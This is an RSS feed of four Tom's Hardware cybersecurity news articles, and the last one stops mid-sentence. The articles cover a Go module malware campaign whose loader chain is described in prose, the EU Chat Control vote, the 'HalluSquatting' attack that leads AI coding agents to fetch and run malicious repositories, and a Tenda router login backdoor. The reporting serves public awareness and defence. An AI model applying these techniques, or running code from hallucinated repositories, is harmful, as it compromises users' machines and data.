<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:dc="https://purl.org/dc/elements/1.1/"
     xmlns:dcterms="http://purl.org/dc/terms/"
     xmlns:media="http://search.yahoo.com/mrss/"
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:cf="https://www.futureplc.com/rss/content-flags"
>
    <channel>
                    <atom:link href="https://www.tomshardware.com/feeds/tag/cyber-security" rel="self" type="application/rss+xml" />
                            <title><![CDATA[ Latest from Tom's Hardware in Cyber-security ]]></title>
                <link>https://www.tomshardware.com/tech-industry/cyber-security</link>
        <description><![CDATA[ All the latest cyber-security content from the Tom's Hardware team ]]></description>
                                    <lastBuildDate>Sat, 11 Jul 2026 11:00:00 +0000</lastBuildDate>
                            <language>en</language>
                                <item>
                                                            <title><![CDATA[ Fake Go DNS scanner spread malware through over 200 GitHub repos — 'Operation Muck and Load' has published 700 malicious modules since January ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/fake-go-dns-scanner-published-700-malicious-versions-before-researchers-traced-it-to-222-github-repos</link>
                                                                            <description>
                            <![CDATA[ The module published its first version on January 24 this year and has since accumulated more than 1,200 versions. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Xvf7wu4pZ6D8yXSEptBtNY</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/2Z9rxwcvZrC34RGiyKN9Tj-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Sat, 11 Jul 2026 11:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/2Z9rxwcvZrC34RGiyKN9Tj-1280-80.png">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[GitHub]]></media:description>                                                            <media:text><![CDATA[GitHub]]></media:text>
                                <media:title type="plain"><![CDATA[GitHub]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/2Z9rxwcvZrC34RGiyKN9Tj-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Supply-chain security firm Socket has<a href="https://socket.dev/blog/malicious-go-module-exposes-github-malware-lure-network"> <u>published research findings</u></a> describing a Go module that posed as a DNS and subdomain scanner while acting as a first-stage Windows malware loader. The firm then traced it to a network of 222 GitHub repositories across 190 accounts. The module published its first version on January 24 this year and has since accumulated more than 1,200 versions, over 700 of them malicious. Socket tracks the campaign as “Operation Muck and Load” and reported the module to the Go security team, which blocked it from the Go module proxy.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: AI and data centers</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Vh4nY3pMCcmra2ymXah9S7" name="Microsoft data center in Mount Pleasant, Wisconsin" caption="" alt="Microsoft data center in Mount Pleasant, Wisconsin" src="https://cdn.mos.cms.futurecdn.net/Vh4nY3pMCcmra2ymXah9S7.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Microsoft)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/photonics-and-high-speed-data-movement-is-the-next-big-ai-bottleneck-following-copper-power-dram-and-nand?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Photonics and high-speed data movement is the next big AI bottleneck</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cooling/the-data-center-cooling-state-of-play-2025-liquid-cooling-is-on-the-rise-thermal-density-demands-skyrocket-in-ai-data-centers-and-tsmc-leads-with-direct-to-silicon-solutions?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">The data center cooling state of play</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/artificial-intelligence/massive-ai-data-center-buildouts-are-squeezing-energy-supplies-new-energy-methods-are-being-explored-as-power-demands-are-set-to-skyrocket?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Massive AI data center buildouts are squeezing energy supplies</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/networking/ultra-ethernet-the-data-center-interconnection-of-tomorrow-detailed?utm_source=edit-links&utm_medium=boxout&utm_term=datacenter" target="_blank">Ultra Ethernet: The data center interconnection of tomorrow</a></li></ul></p></div></div><p>Go derives a pseudo-version from the commit timestamp and hash for any commit that lacks a semantic version tag. Socket attributes the sprawl to the threat actor's own GitHub Actions workflow, saying its timed commits could each be resolved as a version, inflating a scanner utility's release history into the hundreds.</p><p>Across the confirmed repositories, Socket found the same workflow: it sets the Git email to ischhfd83@rambler.ru, sets the visible commit username to the current repository owner, and then force-pushes a rewritten log file every minute. That split generated owner-attributed activity across disposable accounts while leaving one reusable fingerprint. Socket counted a repository only when both the email and the workflow appeared together, resulting in 222 repositories as the confirmed minimum.</p><p>The module's main.go launches a hidden PowerShell command that downloads content from muckcoding.com, decodes it with certutil, and runs the result with execution-policy bypass. Socket describes the decoded script as a multi-layer loader using Base64 encoding and XOR decryption, with a Turkish-language comment in one layer that translates to "run directly, no other step is needed."</p><p>Rather than hardcoding a payload URL, the resolver retrieves text from public platforms, searches it for the marker string "LastW," then decrypts the trailing blob with a hardcoded key to recover the actual download location. Primary dead drops include Pastebin and a paste service called Rlim, with fallbacks across YouTube, Instagram, Telegram, Google Docs, and GitCode. If defenders remove one paste or block the final archive URL, the actor can update the resolver content without touching the first-stage loader.</p><p>The resolved URL points to a password-protected 7-Zip archive hosted as a GitHub release asset. The loader extracts it into a directory named to resemble a legitimate Microsoft Photos install and launches Microsoft.exe from that path with a hidden window. Decoded payload stages map to AsyncRAT, Quasar, and Remcos-style RAT detections alongside infostealer behavior.</p><p>Socket confirmed at least 14 unique malware files across the analyzed set, including Trojan loaders and downloaders,<a href="https://www.tomshardware.com/tech-industry/cyber-security/kaspersky-finds-malware-hidden-in-steam-wallpapers-that-hijacks-accounts-to-spread-itself"> <u>Vidar infostealer</u></a>, dropper and spyware payloads, and XMRig-related Monero cryptominers. One Loader.exe appeared byte-identically across four separate repositories.</p><p>Lure themes span MetaMask and Trust Wallet integrations, seed-phrase utilities, Binance and PayPal automation, Telegram and Discord bots, and game cheats for PUBG, Valorant, and Escape from Tarkov. One PUBG repository, nrevv1lad/Pubg-DESYNC-Menu, presented itself as an external cheat with an installation guide while hosting a Vidar-linked Loader.exe in its source tree.</p><p>Socket assesses with high confidence that Operation Muck and Load belongs to the same cluster that Sophos documented in June last year. Sophos researchers Matt Wixey and Andrew O'Donnell traced 141 GitHub repositories, 133 of them backdoored, to the same ischhfd83@rambler.ru address. Sophos also identified "Muck" as one of the actor's aliases, a label now embedded in the muckcoding.com and muckdeveloper.com domains.</p><p>Neither GitHub nor the Go team has commented beyond the proxy block.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Chat Control 1.0 sneaks through the EU Parliament, letting companies scan user data without warrants — legal tactic used to force a majority-required re-vote on eve of Parliament break ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/chat-control-1-0-sneaks-through-the-eu-parliament-letting-companies-scan-user-data-without-warrants-legal-tactic-used-to-force-a-majority-required-re-vote-on-eve-of-parliament-break</link>
                                                                            <description>
                            <![CDATA[ Chat Control 1.0 sneaks through the EU Parliament, letting companies scan user data without warrants — legal skullduggery used to force a majority-required re-vote on eve of Parliament break ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">fvAtg4rCF7TRMNjs8ZNQtS</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/UgNW86miBDbSaHL2M7QY8R-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 10 Jul 2026 11:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/UgNW86miBDbSaHL2M7QY8R-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[BRUSSELS, BELGIUM - JULY 2: Members of the Committee of the Regions atttend a session of the CdR in the hemicycle of the European Parliament on july 2, 2026 in Brussels, Belgium. The CoR is the EU&#039;s assembly of local and regional representatives that provides advice on proposed legislation affecting regions and cities. Its function is to ensure that the voices of sub-national authorities are heard in EU decision-making and that the principle of subsidiarity is respected, meaning decisions are taken at the most appropriate level, closest to citizens when possible. (Photo by Thierry Monasse/Getty Images)]]></media:description>                                                            <media:text><![CDATA[BRUSSELS, BELGIUM - JULY 2: Members of the Committee of the Regions atttend a session of the CdR in the hemicycle of the European Parliament on july 2, 2026 in Brussels, Belgium. The CoR is the EU&#039;s assembly of local and regional representatives that provides advice on proposed legislation affecting regions and cities. Its function is to ensure that the voices of sub-national authorities are heard in EU decision-making and that the principle of subsidiarity is respected, meaning decisions are taken at the most appropriate level, closest to citizens when possible. (Photo by Thierry Monasse/Getty Images)]]></media:text>
                                <media:title type="plain"><![CDATA[BRUSSELS, BELGIUM - JULY 2: Members of the Committee of the Regions atttend a session of the CdR in the hemicycle of the European Parliament on july 2, 2026 in Brussels, Belgium. The CoR is the EU&#039;s assembly of local and regional representatives that provides advice on proposed legislation affecting regions and cities. Its function is to ensure that the voices of sub-national authorities are heard in EU decision-making and that the principle of subsidiarity is respected, meaning decisions are taken at the most appropriate level, closest to citizens when possible. (Photo by Thierry Monasse/Getty Images)]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/UgNW86miBDbSaHL2M7QY8R-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Chat Control 1.0 law that enables warrantless mass scanning of digital communications has been voted against multiple times by the EU Parliament. And yet, just like a movie zombie, it keeps getting resurrected by various legal sleight-of-hand moves. Yesterday, one of those tricks worked, as <a href="https://www.europarl.europa.eu/news/en/press-room/20260706IPR46318/combating-child-sexual-abuse-support-for-a-more-limited-eprivacy-derogation">Chat Control 1.0 passed</a> (or rather, was not rejected) in a forced re-vote that required an absolute majority (50% + 1) for active refusal. This brings back the law until 2028, and sets a different stage for September's upcoming discussion on Chat Control 2.0.</p><p>After the impending publication in the EU Official Journal, online direct-communication platforms will be allowed to mass-scan their users' data without the need for a warrant, under the guise of looking for child sexual abuse material (CSAM).</p><p>The scanning is not mandatory, but big tech firms will have a legal mechanism to rifle through user data. EU firms have historically refrained from doing so, presenting privacy and data sovereignty as selling points, but the legal door is nevertheless now officially open.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: Taiwan, trade, and tariffs</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="p2QqhVFP7dTRWfeVBCYBYV" name="tsmc-semiconductor-fab-hero" caption="" alt="tsmc" src="https://cdn.mos.cms.futurecdn.net/p2QqhVFP7dTRWfeVBCYBYV.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: tsmc)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/chinas-latest-round-of-rare-earth-export-controls-gives-the-country-dominion-over-precious-resources-regulations-have-far-reaching-implications-for-the-semiconductor-industry?utm_source=edit-links&utm_medium=boxout&utm_term=trade" target="_blank">China's latest round of rare-earth export controls explained</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/artificial-intelligence/analyzing-washingtons-new-ai-accelerator-export-rules-smaller-manufacturers-suffer-while-nvidia-and-amd-will-reap-the-rewards?utm_source=edit-links&utm_medium=boxout&utm_term=trade" target="_blank">Analyzing Washington's new AI accelerator export rules</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/u-s-government-plans-tariff-exemptions-for-tsmc-if-it-follows-through-on-american-investment-usd165-billion-already-pledged-to-increase-production-capacity-but-details-of-the-deal-are-still-murky?utm_source=edit-links&utm_medium=boxout&utm_term=trade" target="_blank">U.S. government plans tariff exemptions for TSMC</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/nvidia-wants-chinas-market-share-to-secure-the-future-of-cuda-in-the-region-americas-trade-war-threatens-huangs-influence-and-could-bolster-competition?utm_source=edit-links&utm_medium=boxout&utm_term=trade" target="_blank">Nvidia wants China's market share to secure the future of CUDA in the region</a></li></ul></p></div></div><p>The obvious platforms where monitoring can now take place will be e-mail and chat services. Immediate examples include Gmail, iCloud, Hotmail, Discord, Instagram, Slack, Teams, Snapchat, Xbox, and Google Chat.</p><p>Although the law's scope is for "interpersonal communications services," the legal mechanism might hypothetically extend to some gray areas like Google Drive, where sending someone a link to a cloud file could be within the scope of the law.</p><p>It's worth noting that "direct communication" isn't restricted to one-to-one chats, as it includes group chats; just not public or undirected communications. Additionally, EU law enforcement is still beholden to the same warrant requirement as before — Chat Control 1.0 does not grant a blank pass to authorities to mass-scan user data, or request companies to do so without a targeted warrant.</p><p>Thanks to two amendments in yesterday's vote, end-to-end-encrypted (E2EE) communications means (ex: WhatsApp) stay exempt. That means that for now, Chat Control 1.0 isn't a commandment to break encryption, something that has been regularly suggested by lawmakers around the world.</p><p>It's as good a time as any to remind people that Instagram messages are no longer E2EE as of May, and that although WhatsApp's messages are encrypted, the <a href="https://cybersecuritynews.com/whatsapp-device-fingerprinting/" target="_blank">service leaks out</a> every single bit of metadata about them — sender, recipient, time, size, etc. As always, <a href="https://signal.org/" target="_blank">Signal is recommended</a> as a privacy-focused communications app.</p><p>This latest development in the EU parliament is eliciting widespread public outcry due to the nature of the law itself, but also due to the manner in which it happened.  <a href="https://euperspectives.eu/2026/03/eu-scrambles-to-save-chat-control/">Critics and opponents</a> of the rule are <a href="https://www.patrick-breyer.de/en/eu-parliament-greenlights-chat-control-1-0-breyer-our-children-lose-out/">suggesting</a> this move is unprecedented.</p><p>Chat Control 1.0 has already been shot down repeatedly, most recently in March. However, European Parliament President Roberta Metsola forced a second reading of the law, and invoked Rule 163's "urgent procedure" mechanism. This had many effects, including bringing up a law that was <em>voted against </em>for discussion yet again; turning the decision into a denial vote (vote-to-deny, not vote-to-pass); exploiting the second-reading requirement that demands an absolute majority vote (50% + 1); and letting the President herself set the schedule. Metsola scheduled the second reading to the very last day before the European Parliament summer recess. </p><p>The result was that out of 720 representatives, only 607 actually cast a vote. Of those, 315 (over half) voted against Chat Control 1.0. That figure did not meet the supermajority threshold of 361, which was calculated against a full chamber.</p><p>Opponents to Chat Control have posted resources at the <a href="https://fightchatcontrol.eu/">Fight Chat Control website</a>, including a breakdown of member-state and individual representative voting positions and contact information.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ New hack exploits AI hallucinations to trick agents into running malicious code — 'HalluSquatting' attack exploits a fundamental weakness in every available model ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/hallusquatting-is-the-latest-agentic-ai-exploit-where-models-dream-up-potentially-malicious-urls-in-tool-calls-attack-exploits-a-fundamental-weakness-in-every-available-model</link>
                                                                            <description>
                            <![CDATA[ Attackers can exploit how AI bots hallucinate software URLs to create massive botnets. The vulnerability is endemic to every model. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">3vHL2UkHKXzpsXxpixwGem</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/iBu6BXKDx9eNtLPFhAZHXh-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 09 Jul 2026 11:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/iBu6BXKDx9eNtLPFhAZHXh-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[AI robot agents]]></media:description>                                                            <media:text><![CDATA[AI robot agents]]></media:text>
                                <media:title type="plain"><![CDATA[AI robot agents]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/iBu6BXKDx9eNtLPFhAZHXh-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Ever since the advent of agentic AI, security researchers have been yelling from the top of their lungs about how it's a bad idea to grant user-level permissions to an LLM — for all purposes, a program with non-deterministic outputs and inconsistent handling of inputs. <a href="https://sites.google.com/view/agentic-botnets/home">A research paper on HalluSquatting</a> from researchers at Tel Aviv University, Technion, and Intuit, shows how easily one can fool modern AI bots and harness them into a massive army of AI agents, with the research showing that agents can hallucinate potentially malicious code repositories up to 85% of the time.</p><p>The mechanism for HalluSquatting (aka "adversarial hallucination squatting") is surprisingly simple, and takes advantage of the fact that when met with unfamiliar terms, bots <em>will not know they're incorrect </em>and hallucinate a "correct" answer. Adding to that, the methods the bots use to come up with said answer are predictable, for example, <em>owner/repository</em> or <em>toolname/toolname</em> GitHub URLs. This is different than just standard typo-squatting, as it exploits the hallucination mechanism itself.</p><p>An attacker first identifies an application, code repository, programming library, or bot skill that's gained popularity only in recent months or years — let's say, a new GitHub repo with the URL <em>OriginalOwner/WindowsTelemetryOff</em>. As the bots' training data is not recent enough to contain information about it, GitHub URLs owner/repo combinations <em>SuperHacker/WindowsTelemetryOff</em> , and <em>WindowsTelemetryOff/WindowsTelemetryOff</em> look just as peachy. Likewise, <em>WindowsTelemetryOf</em> and <em>WindowTelemetryOff</em> (note the typos) will be valid candidates.</p><p>The attacker then creates a malicious repository using those generated names. When Claude or another code agent is asked to "run the windowstelemetryoff scripts" or a similar instruction, chances are they'll hallucinate the repo name (sometimes even having run a web search), run into the malicious version that looks like the original, and happily run whatever's in there.</p><p>From that point, all bets are off now that the attacker's code is running on the user's machine. The most obvious outcome could be creating a reverse shell (the user's machine opens a command line that's controlled remotely). Now having access to the user's account, the attacker can siphon off their data and passwords, install software, run crypto miners, or harness their AI agent for further malfeasance, all with the power of entire data centers at their disposal.</p><p>And here's the kicker: just the one HalluSquatted piece of software has the potential to bait and reel in tens of thousands of bots, if not more, in a proverbial blink of an eye. A crafty attacker would be kind enough to include all the original code in their poisoned version, adding yet another layer of unawareness to the mix.</p><p>The research team found that an LLM will hallucinate the location of a recent code repository up to 85% of the time, a figure that can reach 100% for trending agentic skills. Every single model is widely affected, up to and including Anthropic's mighty Claude Opus 4.5. At the application level, the figures are better, but still pretty bad.</p><p>The scientists are working on common LLM-backed programming applications, including Cursor, Windsurf, and OpenClaw, among others. In this scenario, the bots stand a better chance given they're working with more context information, but even still, the success rates for hacking ranged from 20%-35% for Cursor, Gemini CLI, and Copilot, and increased massively to close to 80-100% on OpenClaw and its variants. The exploit mechanism doesn't even need to be crafted specifically for any bot; the researchers' results show it's universal and transferable, too.</p><p>The mean hallucination rate for names of sample GitHub repositories published in 2025 is 92.4%, while predictably, bots get the URLs wrong 0.9% for those from 2019 or earlier, though that's arguably still a concerning figure. The most effective mitigation is adjusting workflow: instructing bots to always run web searches before installing software, and providing them with additional context. Unfortunately, that's not the default way most people appear to use them.</p><p>Cybersecurity professionals have long advocated for not blindly trusting a bot's actions and severely restricting the access level granted to AI agents. And yet it's not uncommon to see bots with wide-ranging permissions over users' machines, API keys, access keys, and service accounts, to name a few — all in a bid to make it "easier" for the bot to vibe-code their <a href="https://tvtropes.org/pmwiki/pmwiki.php/Main/PointyHairedBoss" target="_blank">pointy-haired-boss'</a> latest brilliant idea.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Hidden backdoor in Tenda routers goes unpatched as company ignores warnings from cybersecurity researchers — Chinese company's firmware allows admin access without a password ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/hidden-backdoor-found-in-tenda-routers-goes-unpatched-despite-warnings-from-cybersecurity-researchers-affected-firmware-allows-admin-access-without-a-password</link>
                                                                            <description>
                            <![CDATA[ CERT/CC has disclosed a critical authentication backdoor affecting multiple Tenda router firmware versions. Tracked as CVE-2026-11405, the flaw grants full administrator access without valid credentials, and no vendor patch is currently available after CERT failed to reach Tenda. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Tgz5gTHCkKmjQwpgPWAbgb</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/uX8ghCJT8DyjkPQPLQVehC-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 08 Jul 2026 15:16:25 +0000</pubDate>                                                                                                                                <updated>Wed, 08 Jul 2026 15:18:31 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Etiido Uko ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/BBrMt7jWtSo2Dc3iKoroyD.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Etiido Uko is a mechanical engineer and senior technical writer with over nine years of experience in documentation and reporting. He is deeply passionate about all things engineering and technology, and is an expert in gadgets, manufacturing, robotics, automotive, and aerospace. His work spans content creation for industry leaders across multiple sectors, including Autodesk, Siemens, Xometry, Telus, and Coca-Cola. When he is not writing or keeping up with the latest innovations, you can find him exploring lands unknown. Check out more of his work at etiidowrites.com.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/uX8ghCJT8DyjkPQPLQVehC-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Router sitting on a table. ]]></media:description>                                                            <media:text><![CDATA[Router sitting on a table. ]]></media:text>
                                <media:title type="plain"><![CDATA[Router sitting on a table. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/uX8ghCJT8DyjkPQPLQVehC-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The CERT Coordination Center (CERT/CC), a U.S. government-backed cybersecurity group at Carnegie Mellon University's Software Engineering Institute, disclosed a <a href="https://kb.cert.org/vuls/id/213560" target="_blank">firmware flaw</a> on July 6 that can hand attackers full administrative control over several Tenda networking devices. The vulnerability, tracked as CVE-2026-11405, is an undocumented authentication backdoor in the affected models' firmware that bypasses the normal login process and grants access to the devices' web management interface without valid credentials. Compounding the risk, there is currently no security patch available, as Tenda — a Shenzhen-based budget networking brand with a large presence in India and other markets — is yet to respond despite CERT/CC reaching out on the issue.</p><p>CERT/CC lists five affected firmware versions spanning the FH1201, W15E, AC10, AC5, and AC6 router families. The advisory, which credits an anonymous researcher for the finding, does not describe this list as exhaustive. The list covers only the specific builds the researcher reported to CERT/CC, as there is no vendor-confirmed scope. According to the advisory, the flaw resides inside the routers' built-in web server, where an undocumented authentication routine allows administrative access without requiring the configured administrator credentials.</p><p>Like most consumer routers, Tenda devices provide a password-protected web management interface for configuring Wi-Fi settings, firewall rules, DNS servers, firmware updates, port forwarding, parental controls, and other core networking features. Because these interfaces control most aspects of a router's operation, they are typically protected by authentication mechanisms designed to prevent unauthorized users from making changes that could compromise an entire home or business network.</p><p>According to the advisory, the affected firmware initially performs authentication as expected, verifying the administrator password with a standard MD5-based check. However, when that verification fails, the login routine quietly follows a second, undocumented code path. Instead of immediately rejecting the login attempt, the firmware retrieves another password stored internally under the configuration key sys.rzadmin.password and compares it directly against the user-supplied password using the standard C library function strcmp().</p><p>If the supplied password matches this hidden value, the firmware immediately creates a valid administrator session with full privileges. Even more concerning, the associated username is never validated, meaning any username can be used as long as the hidden password is supplied. As a result, the mechanism effectively bypasses the router's configured administrator account altogether.</p><p>While CERT/CC did not disclose the hidden password itself, the existence of an undocumented secondary authentication path significantly weakens the security model of affected devices. Unlike conventional authentication vulnerabilities that stem from implementation errors, this is a separate login path rather than a flaw in the existing one, granting administrative access through credentials that are neither documented nor exposed through the router's management interface. Whether that path was placed there deliberately or left in as a forgotten development feature is unclear. CERT/CC draws no conclusion on intent, and Tenda's silence settles nothing.</p><p>Successful exploitation grants an attacker unrestricted control over the router's configuration. With administrator access, an attacker could modify network settings, change DNS servers to redirect internet traffic, disable security protections, replace administrator credentials, or enable additional remote access features. As routers serve as the gateway between local devices and the internet, compromising one <a href="https://www.tomshardware.com/tech-industry/cyber-security/9-000-asus-routers-compromised-by-botnet-attack-and-persistent-ssh-backdoor-that-even-firmware-updates-cant-fix" target="_blank">can expose every connected system</a> on the network to further attacks.</p><p>Pending official Tenda firmware updates, CERT/CC recommends disabling remote web management wherever possible to prevent attackers from reaching the administrative interface over the internet. The organization also advises limiting local network exposure, noting that while changing a router's default LAN IP address may reduce opportunistic discovery by automated scanning tools, it does not protect against determined attackers performing targeted network reconnaissance. </p><p>The disclosure echoes the concerns the Federal Communications Commission (FCC) cited when it <a href="https://www.tomshardware.com/networking/routers/fcc-bans-import-of-new-consumer-routers-not-made-in-the-us-over-security-threat-agency-says-foreign-made-devices-pose-unacceptable-risk-to-us-persons" target="_blank">added certain foreign-made networking products</a> to its Covered List in March, preventing new models from receiving the authorization required for import and sale in the U.S. The FCC argued that <a href="https://www.tomshardware.com/networking/routers/heres-what-the-fcc-ban-on-foreign-manufactured-routers-actually-means-for-consumers" target="_blank">compromised consumer routers</a> can provide attackers with a foothold into home and small-business networks. An undocumented administrator backdoor in widely sold networking equipment — combined with the absence of a vendor patch or response — illustrates the type of supply-chain security risk regulators 